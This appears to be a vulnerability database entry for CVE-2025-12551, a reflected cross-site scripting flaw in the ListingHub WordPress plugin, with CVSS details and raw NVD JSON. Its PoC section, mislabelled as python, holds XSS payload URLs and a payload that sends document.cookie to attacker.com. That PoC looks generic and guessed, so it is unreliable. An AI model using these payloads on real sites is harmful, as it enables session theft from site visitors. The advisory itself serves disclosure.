Security Vulnerability Report
中文
CVE-2025-12551 CVSS 7.1 HIGH

CVE-2025-12551

Published: 2026-01-08 10:15:45
Last Modified: 2026-04-27 18:16:20

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins ListingHub listinghub allows Reflected XSS.This issue affects ListingHub: from n/a through 1.2.6.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ListingHub < 1.2.7
e-plugins ListingHub through 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-12551 PoC - Reflected XSS in WordPress ListingHub Plugin --> <!-- Example: Attacker crafts a URL with malicious script --> <!-- Basic PoC URL structure --> <!-- https://vulnerable-site.com/?search=<script>alert(document.cookie)</script> --> <!-- More sophisticated PoC with event handler --> <!-- https://vulnerable-site.com/?search="><img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)> --> <!-- HTML encoded version to bypass some filters --> <!-- https://vulnerable-site.com/?search=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E --> <!-- PoC JavaScript code --> (function(){ // Create malicious URL const baseUrl = window.location.origin; const maliciousParam = '<script>alert(document.domain)</script>'; const exploitUrl = baseUrl + '/?s=' + encodeURIComponent(maliciousParam); // Log exploit URL for demonstration console.log('Exploit URL:', exploitUrl); // Simulate cookie stealing payload const cookieStealPayload = '<img src=x onerror="fetch(`https://attacker.com/log?c=${document.cookie}`)">'; console.log('Cookie steal payload:', cookieStealPayload); })();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12551", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:45.283", "lastModified": "2026-04-27T18:16:20.490", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins ListingHub listinghub allows Reflected XSS.This issue affects ListingHub: from n/a through 1.2.6."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en e-plugins ListingHub listinghub permite XSS Reflejado. Este problema afecta a ListingHub: desde n/a hasta 1.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/listinghub/vulnerability/wordpress-listinghub-plugin-1-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}